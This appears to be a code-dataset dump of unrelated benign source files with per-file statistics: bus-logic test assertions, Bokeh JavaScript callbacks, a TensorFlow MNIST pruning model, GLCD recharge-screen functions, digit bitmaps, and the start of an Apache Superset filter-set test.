input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1) enable.value = 0 input_1.value = 0 input_2.value = 1 input_3.value = 1 input_4.value = 1 input_5.value = 1 input_6.value = 1 input_7.value = 1 input_8.value = 1 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1) enable.value = 0 input_1.value = 1 input_2.value = 1 input_3.value = 1 input_4.value = 1 input_5.value = 1 input_6.value = 1 input_7.value = 1 input_8.value = 1 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1) enable.value = 1 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 0 input_10.value = 0 input_11.value = 0 input_12.value = 0 input_13.value = 0 input_14.value = 0 input_15.value = 0 input_16.value = 0 assert output_bus.wire_values == ( 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1) enable.value = 1 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 0 input_10.value = 0 input_11.value = 0 input_12.value = 0 input_13.value = 0 input_14.value = 0 input_15.value = 0 input_16.value = 1 assert output_bus.wire_values == ( 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0) enable.value = 1 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 0 input_10.value = 0 input_11.value = 0 input_12.value = 0 input_13.value = 0 input_14.value = 0 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0) enable.value = 1 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 0 input_10.value = 0 input_11.value = 0 input_12.value = 0 input_13.value = 0 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0) enable.value = 1 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 0 input_10.value = 0 input_11.value = 0 input_12.value = 0 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0) enable.value = 1 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 0 input_10.value = 0 input_11.value = 0 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0) enable.value = 1 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 0 input_10.value = 0 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0) enable.value = 1 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 0 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0) enable.value = 1 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0) enable.value = 1 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 1 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0) enable.value = 1 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 1 input_8.value = 1 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) enable.value = 1 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 1 input_7.value = 1 input_8.value = 1 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) enable.value = 1 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 1 input_6.value = 1 input_7.value = 1 input_8.value = 1 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) enable.value = 1 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 1 input_5.value = 1 input_6.value = 1 input_7.value = 1 input_8.value = 1 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) enable.value = 1 input_1.value = 0 input_2.value = 0 input_3.value = 1 input_4.value = 1 input_5.value = 1 input_6.value = 1 input_7.value = 1 input_8.value = 1 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) enable.value = 1 input_1.value = 0 input_2.value = 1 input_3.value = 1 input_4.value = 1 input_5.value = 1 input_6.value = 1 input_7.value = 1 input_8.value = 1 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) enable.value = 1 input_1.value = 1 input_2.value = 1 input_3.value = 1 input_4.value = 1 input_5.value = 1 input_6.value = 1 input_7.value = 1 input_8.value = 1 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) print(a.__doc__) print(a) a( enable=1, input_bus=(0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1), output_bus=None ) assert output_bus.wire_values == ( 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0)
27.523438
73
0.487558
3,299
21,138
2.915126
0.012428
0.180306
0.328273
0.075699
0.896849
0.896849
0.896849
0.89425
0.89425
0.89425
0
0.164343
0.413048
21,138
767
74
27.559322
0.610784
0
0
0.847527
0
0
0
0
0
0
0
0
0.048077
1
0.001374
false
0
0.001374
0
0.004121
0.002747
0
0
0
null
0
1
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
ada3ecfcf266d5b9fda65cbe51c2da40b7e47f5b
42
py
Python
helloworld.py
OluSure/Hacktoberfest2021-1
ad1bafb0db2f0cdeaae8f87abbaa716638c5d2ea
[ "MIT" ]
215
2021-10-01T08:18:16.000Z
2022-03-29T04:12:03.000Z
helloworld.py
OluSure/Hacktoberfest2021-1
ad1bafb0db2f0cdeaae8f87abbaa716638c5d2ea
[ "MIT" ]
51
2021-10-01T08:16:42.000Z
2021-10-31T13:51:51.000Z
helloworld.py
OluSure/Hacktoberfest2021-1
ad1bafb0db2f0cdeaae8f87abbaa716638c5d2ea
[ "MIT" ]
807
2021-10-01T08:11:45.000Z
2021-11-21T18:57:09.000Z
print("hello world") print("hello World")
14
20
0.714286
6
42
5
0.5
0.666667
1
0
0
0
0
0
0
0
0
0
0.095238
42
2
21
21
0.789474
0
0
0
0
0
0.52381
0
0
0
0
0
0
1
0
true
0
0
0
0
1
1
1
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
7
bc27e6154a8e6ec21c161ff7aa2eda17c5212f7a
2,278
py
Python
main/js_functions.py
Khanatoshs/MET_BAP
51dd28e7ef909fe259164415c2d3fa8427a9329d
[ "MIT" ]
null
null
null
main/js_functions.py
Khanatoshs/MET_BAP
51dd28e7ef909fe259164415c2d3fa8427a9329d
[ "MIT" ]
null
null
null
main/js_functions.py
Khanatoshs/MET_BAP
51dd28e7ef909fe259164415c2d3fa8427a9329d
[ "MIT" ]
null
null
null
from bokeh.models import CustomJS def DateRangeSlider_callback(source,filter): daterange_callback = CustomJS(args=dict(source=source,filter=filter), code=""" const indices = []; for(var i=0;i<source.get_length();i++){ const current_value = cb_obj.value; const current_date = source.data['date'][i]; if(current_date >= current_value[0]&& current_date<=current_value[1]){ indices.push(i); } } filter.indices = indices; source.change.emit(); """ ) return daterange_callback def Button_callback(source,filter,select): button_callback = CustomJS(args=dict(select=select,source=source,filter=filter), code=""" const indices = []; for(var i=0;i<source.get_length();i++){ const current_value = select.value; const current_date = source.data['date'][i]; if(current_date >= current_value[0]&& current_date<=current_value[1]){ indices.push(i); } } filter.indices = indices; source.change.emit(); """ ) return button_callback def Dropdown_y1_callback(source,glyph,plot,legend_item,legend_dict): dropdown_callback = CustomJS(args=dict(source=source,glyph=glyph,plot=plot,legend_item=legend_item,legend_dict=legend_dict), code=""" var value = this.item; glyph.glyph.y.field = value; legend_item.label = legend_dict[value]; plot.y_range.start = Math.min.apply(null,source.data[value]); plot.y_range.end = Math.max.apply(null,source.data[value]); source.change.emit(); """ ) return dropdown_callback def Dropdown_y2_callback(source,glyph,plot,legend_item,legend_dict): dropdown_callback = CustomJS(args=dict(source=source,glyph=glyph,plot=plot,legend_item=legend_item,legend_dict=legend_dict), code=""" var value = this.item; glyph.glyph.y.field = value; legend_item.label = legend_dict[value]; plot.extra_y_ranges.extra_range.start = Math.min.apply(null,source.data[value]); plot.extra_y_ranges.extra_range.end = Math.max.apply(null,source.data[value]); source.change.emit(); """ ) return dropdown_callback
37.966667
128
0.641791
285
2,278
4.94386
0.2
0.056778
0.068133
0.068133
0.841732
0.841732
0.824698
0.800568
0.800568
0.800568
0
0.004535
0.225637
2,278
60
129
37.966667
0.794218
0
0
0.596491
0
0.035088
0.612549
0.214129
0
0
0
0
0
1
0.070175
false
0
0.017544
0
0.157895
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
70dd7f83d46be0acb840f283947c8af2323baa58
6,913
py
Python
mnist_testing/mnist_net.py
lightwell64646/cylindricalsfmlearner
2291d30eaa8318961e4e9eeed616e2aa9b22583c
[ "MIT" ]
null
null
null
mnist_testing/mnist_net.py
lightwell64646/cylindricalsfmlearner
2291d30eaa8318961e4e9eeed616e2aa9b22583c
[ "MIT" ]
null
null
null
mnist_testing/mnist_net.py
lightwell64646/cylindricalsfmlearner
2291d30eaa8318961e4e9eeed616e2aa9b22583c
[ "MIT" ]
null
null
null
import tensorflow as tf import sys sys.path.insert(0, "..") from utils import get_loss_categorical, parameter_count import tf_cylindrical as cylin ''' A Keras model that predicts on MNIST since we want to run in eager mode layer.output isn't available. We use self.last_outs instead for calculating second derivative loss. Note: We write code in eager mode and use tf.function to run in graph mode, but the code still has to compile as eager. Note: If you try to add optimizer to the model parameters it expects a fully compiled model which is (to my knowledge) not compatible with a custom training loop. Therefore optimizer is stored in the mnist_prune_trainer classes (single GPU and distributed). ''' class mnist_net(tf.keras.Model): def __init__(self, opt): super(mnist_net, self).__init__() self.c1 = cylin.conv2d(60, [3, 3], stride=1, padding='VALID', name = "c1", activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg) self.c2 = cylin.conv2d(60, [3, 3], stride=1, padding='VALID', name = "c2", activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg) self.c3 = cylin.conv2d(60, [3, 3], stride=1, padding='VALID', name = "c3", activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg) self.num_convolutional_layers = 3 self.flatten = cylin.flatten(name = "flattening") self.l1 = cylin.linear(100, name = "l1", activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg) self.l2 = cylin.linear(10, name = "l2", L2Regularization=opt.l2_weight_reg) self.last_outs = None self.saliency_tracked_layers = [self.c1, self.c2, self.c3, self.l1] def scramble(self): self.c1.scramble() self.c2.scramble() self.c3.scramble() self.l1.scramble() def call(self, x): y = self.c1(x) y = tf.keras.layers.MaxPool2D()(y) y = self.c2(y) y = self.c3(y) y = self.flatten(y) #y = tf.reduce_sum(y, [1,2]) y = self.l1(y) y = self.l2(y) self.last_outs = [p.last_out for p in self.saliency_tracked_layers] return y def prune(self, metrics, kill_fraction = 0.1, kill_low = True, const_percent = False): assert(len(metrics) == len(self.saliency_tracked_layers)) masks = [] decision_points = [] last_mask = None i = 0 for dl, met in zip(self.saliency_tracked_layers, metrics): #if (i == 0 or i == 1 or i == 3 or i == 2): last_mask, decision_pt = dl.prune(met, last_mask, kill_fraction, kill_low, const_percent) '''else: dl.prune(None, last_mask, kill_fraction, kill_low, const_percent) last_mask = tf.constant([i for i in range(dl.units)]) decision_pt = None''' masks.append(last_mask) decision_points.append(decision_pt) i += 1 if i == self.num_convolutional_layers: last_mask = self.flatten.prune(None, last_mask) self.layers[-1].prune(None, last_mask, kill_fraction) return masks, decision_points class mnist_net_prune_fin_shape(tf.keras.Model): def __init__(self, opt): super(mnist_net_prune_fin_shape, self).__init__() self.c1 = cylin.conv2d(23, [3, 3], stride=1, padding='VALID', name = "c1", activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg) self.c2 = cylin.conv2d(33, [3, 3], stride=1, padding='VALID', name = "c2", activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg) self.c3 = cylin.conv2d(6, [3, 3], stride=1, padding='VALID', name = "c3", activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg) self.num_convolutional_layers = 3 self.flatten = cylin.flatten(name = "flattening") self.l1 = cylin.linear(71, name = "l1", activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg) self.l2 = cylin.linear(10, name = "l2", L2Regularization=opt.l2_weight_reg) self.last_outs = None self.saliency_tracked_layers = [self.c1, self.c2, self.c3, self.l1] def scramble(self): self.c1.scramble() self.c2.scramble() self.c3.scramble() self.l1.scramble() def call(self, x): y = self.c1(x) y = tf.keras.layers.MaxPool2D()(y) y = self.c2(y) y = self.c3(y) y = self.flatten(y) #y = tf.reduce_sum(y, [1,2]) y = self.l1(y) y = self.l2(y) self.last_outs = [p.last_out for p in self.saliency_tracked_layers] return y def prune(self, metrics, kill_fraction = 0.1, kill_low = True, const_percent = False): assert(len(metrics) == len(self.saliency_tracked_layers)) masks = [] decision_points = [] last_mask = None i = 0 for dl, met in zip(self.saliency_tracked_layers, metrics): #if (i == 0 or i == 1 or i == 3 or i == 2): last_mask, decision_pt = dl.prune(met, last_mask, kill_fraction, kill_low, const_percent) '''else: dl.prune(None, last_mask, kill_fraction, kill_low, const_percent) last_mask = tf.constant([i for i in range(dl.units)]) decision_pt = None''' masks.append(last_mask) decision_points.append(decision_pt) i += 1 if i == self.num_convolutional_layers: last_mask = self.flatten.prune(None, last_mask) self.layers[-1].prune(None, last_mask, kill_fraction) return masks, decision_points class mnist_net_strong_initialization(tf.keras.Model): def __init__(self, opt): super(mnist_net_strong_initialization, self).__init__() self.c1 = cylin.conv2d(50, [5, 5], stride=1, padding='VALID', name = "c1", activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg) self.proc = cylin.conv2d(20, [5, 5], stride=1, padding='VALID', name = "proc", activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg) self.l1 = cylin.linear(50, name = "l1", activation = tf.nn.relu, L2Regularization=opt.l2_weight_reg) self.l2 = cylin.linear(10, name = "l2", L2Regularization=opt.l2_weight_reg) self.last_outs = None def call(self, x): y = tf.keras.layers.MaxPool2D()(self.c1(x)) y = tf.keras.layers.MaxPool2D()(self.proc(y)) y = tf.reshape(y, [-1, y.shape[1] * y.shape[2] * y.shape[3]]) y = self.l1(y) y = self.l2(y) self.last_outs = [self.c1.last_out, self.proc.last_out, self.l1.last_out] return y
43.477987
102
0.597425
958
6,913
4.141962
0.177453
0.03629
0.074093
0.095262
0.813004
0.803679
0.78755
0.77369
0.766129
0.766129
0
0.035837
0.281499
6,913
159
103
43.477987
0.763036
0.019962
0
0.775862
0
0
0.016376
0
0
0
0
0
0.017241
1
0.086207
false
0
0.034483
0
0.189655
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
cb1b8de0405d477af224f1fd2fe01cfa7778f9a2
56
py
Python
python_strelka_client/protocals/__init__.py
nighttardis/python_strelka_client
1b0698a6f6cd40b77ff887e445d9fd377b997925
[ "Apache-2.0" ]
null
null
null
python_strelka_client/protocals/__init__.py
nighttardis/python_strelka_client
1b0698a6f6cd40b77ff887e445d9fd377b997925
[ "Apache-2.0" ]
null
null
null
python_strelka_client/protocals/__init__.py
nighttardis/python_strelka_client
1b0698a6f6cd40b77ff887e445d9fd377b997925
[ "Apache-2.0" ]
null
null
null
from . import strelka_pb2 from . import strelka_pb2_grpc
28
30
0.839286
9
56
4.888889
0.555556
0.454545
0.772727
0.909091
0
0
0
0
0
0
0
0.040816
0.125
56
2
30
28
0.857143
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
cb8df16ec949bcedeb5ecb7e322af5ae01e2b7cd
5,372
py
Python
hexa-beta/rechargeScreen.py
projecthexa/hexa
d3ad27283903bf895c70a4f8aee2c0f899b0c797
[ "MIT" ]
7
2018-09-12T18:53:24.000Z
2021-01-04T04:21:36.000Z
hexa-beta/rechargeScreen.py
SahajKhandelwal/hexa
d3ad27283903bf895c70a4f8aee2c0f899b0c797
[ "MIT" ]
null
null
null
hexa-beta/rechargeScreen.py
SahajKhandelwal/hexa
d3ad27283903bf895c70a4f8aee2c0f899b0c797
[ "MIT" ]
3
2018-05-24T22:16:37.000Z
2019-03-14T10:05:42.000Z
__author__ = 'guru' #state 10 = recharge amount #state 20 = Ask's user to place their finger on FPS #state 30 = Scanning ur finger now #state 31 = account not found #state 40 = recharge successful #screen = 0 vendor,screen = 1 customer. import GLCD as g currentState = 0 fontWidth = 6 lineLength = 21 def state10(rechargeAmount = "0"): global currentState if currentState == 10: num(rechargeAmount) return currentState = 10 #vendor Screen g.clearDisplay(0) string = ("{:^%d}" % lineLength).format("Recharge Amount") g.displayText(string,2,0,0) string = ("{:<%d}" % lineLength).format("Rs.") g.displayText(string, 3, 0, 0) string = "{:<4}".format(rechargeAmount) g.displayText(string, 3, (3 * fontWidth - 1), 0) #User Screen g.clearDisplay(1) string = ("{:^%d}" % lineLength).format("Recharge Amount") g.displayText(string,2,0,1) string = ("{:<%d}" % lineLength).format("Rs.") g.displayText(string,3,0,1) string = "{:<4}".format(rechargeAmount) g.displayText(string,3,(3*fontWidth-1),1) def num(rechargeAmount): # vendor Screen string = "{:<4}".format(rechargeAmount) g.displayText(string, 3, (3 * fontWidth - 1), 0) #User Screen string = "{:<4}".format(rechargeAmount) g.displayText(string,3,(3*fontWidth-1),1) def state20(amount = "0"): global currentState currentState = 20 #vendor Screen g.clearDisplay(0) string = ("{:^%d}" % lineLength).format("Recharging...") g.displayText(string,0,0,0) string = ("{:<%d}" % lineLength).format("Recharge Rs. ") g.displayText(string, 2, 0, 0) g.displayText(amount + " ?", 2, (13 * fontWidth - 1), 0) string = ("{:<%d}" % lineLength).format("Waiting for Finger") g.displayText(string,4,0,0) #User Screen g.clearDisplay(1) string = ("{:^%d}" % lineLength).format("Recharging...") g.displayText(string,0,0,1) string = ("{:^%d}" % lineLength).format("Recharge Rs. ") g.displayText(string, 2, 0, 1) g.displayText(amount + " ?", 2, (13 * fontWidth - 1), 1) string = ("{:^%d}" % lineLength).format("Place ur Finger") g.displayText(string,4,0,1) def state30(): global currentState currentState = 30 #vendor Screen g.clearDisplay(0) string = ("{:^%d}" % lineLength).format("Scanning User's") g.displayText(string,2,0,0) string = ("{:^%d}" % lineLength).format("Finger...") g.displayText(string,3,0,0) #User Screen g.clearDisplay(1) string = ("{:^%d}" % lineLength).format("Scanning Your") g.displayText(string,2,0,1) string = ("{:^%d}" % lineLength).format("Finger...") g.displayText(string,3,0,1) def state31(amount): global currentState currentState = 31 #vendor Screen g.clearDisplay(0) string = ("{:^%d}" % lineLength).format("Account Not Found") g.displayText(string,0,0,0) string = ("{:^%d}" % lineLength).format("Try again") g.displayText(string,1,0,0) string = ("{:<%d}" % lineLength).format("Recharge Rs. ") g.displayText(string, 3, 0, 0) g.displayText(amount + " ?", 3, (13 * fontWidth - 1), 0) string = ("{:<%d}" % lineLength).format("Waiting for Finger") g.displayText(string,4,0,0) #User Screen g.clearDisplay(1) string = ("{:^%d}" % lineLength).format("OOPS!") g.displayText(string, 0, 0, 1) string = ("{:^%d}" % lineLength).format("Account Not Found") g.displayText(string,1,0,1) string = ("{:^%d}" % lineLength).format("Try again") g.displayText(string,2,0,1) string = ("{:<%d}" % lineLength).format("Recharge Rs. ") g.displayText(string, 4, 0, 1) g.displayText(amount + " ?", 4, (13 * fontWidth - 1), 1) string = ("{:<%d}" % lineLength).format("Waiting for Finger") g.displayText(string,5,0,1) def state40(rechargeAmount,newBalance,mobileNumber): global currentState currentState = 40 #vendor Screen g.clearDisplay(0) string = ("{:^%d}" % lineLength).format("Recharge Successful") g.displayText(string,2,0,0) string = ("{:<%d}" % lineLength).format("Rs.") g.displayText(string,3,0,0) g.displayText(rechargeAmount,3,(3*fontWidth-1),0) string = ("{:^%d}" % lineLength).format("Current Balance is") g.displayText(string,4,0,0) string = ("{:<%d}" % lineLength).format("Rs.") g.displayText(string,5,0,0) g.displayText(newBalance,5,(3*fontWidth-1),0) string = ("{:^%d}" % lineLength).format("Mb.no:") g.displayText(string,6,0,0) g.displayText(mobileNumber,6,(6*fontWidth-1),0) #user Screen g.clearDisplay(1) string = ("{:^%d}" % lineLength).format("Recharge Successful") g.displayText(string,2,0,1) string = ("{:<%d}" % lineLength).format("Rs.") g.displayText(string,3,0,1) g.displayText(rechargeAmount,3,(3*fontWidth-1),1) string = ("{:^%d}" % lineLength).format("Your Current Balance") g.displayText(string,4,0,1) string = ("{:<%d}" % lineLength).format("Rs.") g.displayText(string,5,0,1) g.displayText(newBalance,5,(3*fontWidth-1),0) string = ("{:^%d}" % lineLength).format("Mb.no:") g.displayText(string,6,0,1) g.displayText(mobileNumber,6,(6*fontWidth-1),1)
33.36646
68
0.593261
671
5,372
4.743666
0.113264
0.177191
0.209237
0.238454
0.808043
0.794848
0.770657
0.715049
0.688659
0.630537
0
0.050271
0.211281
5,372
160
69
33.575
0.700968
0.065153
0
0.669492
0
0
0.127581
0
0
0
0
0
0
1
0.050847
false
0
0.008475
0
0.067797
0
0
0
0
null
0
1
1
1
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
cb90d8e2b5e5f919b400fc53b750b8950848e667
740
py
Python
score/number.py
sjoonb/osscap2020
ad8a71b196fcfdbdc3f9ba35e8256083beb4e3b7
[ "Apache-2.0" ]
null
null
null
score/number.py
sjoonb/osscap2020
ad8a71b196fcfdbdc3f9ba35e8256083beb4e3b7
[ "Apache-2.0" ]
9
2020-10-07T07:33:51.000Z
2020-12-01T13:49:11.000Z
score/number.py
sjoonb/osscap2020
ad8a71b196fcfdbdc3f9ba35e8256083beb4e3b7
[ "Apache-2.0" ]
null
null
null
num_0 = [ [1, 1, 1], [1, 0, 1], [1, 0, 1], [1, 0, 1], [1, 1, 1] ] num_1 = [ [0, 1, 0], [0, 1, 0], [0, 1, 0], [0, 1, 0], [0, 1, 0] ] num_2 = [ [1, 1, 1], [0, 0, 1], [1, 1, 1], [1, 0, 0], [1, 1, 1] ] num_3 = [ [1, 1, 1], [0, 0, 1], [1, 1, 1], [0, 0, 1], [1, 1, 1] ] num_4 = [ [1, 0, 1], [1, 0, 1], [1, 1, 1], [0, 0, 1], [0, 0, 1] ] num_5 = [ [1, 1, 1], [1, 0, 0], [1, 1, 1], [0, 0, 1], [1, 1, 1] ] num_6 = [ [1, 1, 1], [1, 0, 0], [1, 1, 1], [1, 0, 1], [1, 1, 1] ] num_7 = [ [1, 1, 1], [1, 0, 1], [0, 0, 1], [0, 0, 1], [0, 0, 1] ] num_8 = [ [1, 1, 1], [1, 0, 1], [1, 1, 1], [1, 0, 1], [1, 1, 1] ] num_9 = [ [1, 1, 1], [1, 0, 1], [1, 1, 1], [0, 0, 1], [1, 1, 1] ] alpha_s = [ [0, 1, 1], [1, 0, 0], [1, 1, 1], [0, 0, 1], [1, 1, 0] ]
8.222222
11
0.3
187
740
1.128342
0.069519
0.691943
0.63981
0.379147
0.890995
0.890995
0.876777
0.876777
0.78673
0.620853
0
0.337187
0.298649
740
89
12
8.314607
0.069364
0
0
0.675325
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
1
null
1
1
1
1
1
1
1
1
1
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
12
cbdaef9b95a01d7b35fd7eef2bf2357e1babede8
20,390
py
Python
tests/integration_tests/dashboards/filter_sets/create_api_tests.py
m-ajay/superset
2cd80543581155225f2b538ad8cd5ebc7de5a9ff
[ "Apache-2.0" ]
18,621
2017-06-19T09:57:44.000Z
2021-01-05T06:28:21.000Z
tests/integration_tests/dashboards/filter_sets/create_api_tests.py
m-ajay/superset
2cd80543581155225f2b538ad8cd5ebc7de5a9ff
[ "Apache-2.0" ]
9,043
2017-07-05T16:10:48.000Z
2021-01-05T17:58:01.000Z
tests/integration_tests/dashboards/filter_sets/create_api_tests.py
m-ajay/superset
2cd80543581155225f2b538ad8cd5ebc7de5a9ff
[ "Apache-2.0" ]
5,527
2017-07-06T01:39:43.000Z
2021-01-05T06:01:11.000Z
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from __future__ import annotations from typing import Any, Dict, TYPE_CHECKING from superset.dashboards.filter_sets.consts import ( DASHBOARD_OWNER_TYPE, DESCRIPTION_FIELD, JSON_METADATA_FIELD, NAME_FIELD, OWNER_ID_FIELD, OWNER_TYPE_FIELD, USER_OWNER_TYPE, ) from tests.integration_tests.base_tests import login from tests.integration_tests.dashboards.filter_sets.consts import ( ADMIN_USERNAME_FOR_TEST, DASHBOARD_OWNER_USERNAME, FILTER_SET_OWNER_USERNAME, ) from tests.integration_tests.dashboards.filter_sets.utils import ( call_create_filter_set, get_filter_set_by_dashboard_id, get_filter_set_by_name, ) if TYPE_CHECKING: from flask.testing import FlaskClient def assert_filterset_was_not_created(filter_set_data: Dict[str, Any]) -> None: assert get_filter_set_by_name(str(filter_set_data["name"])) is None def 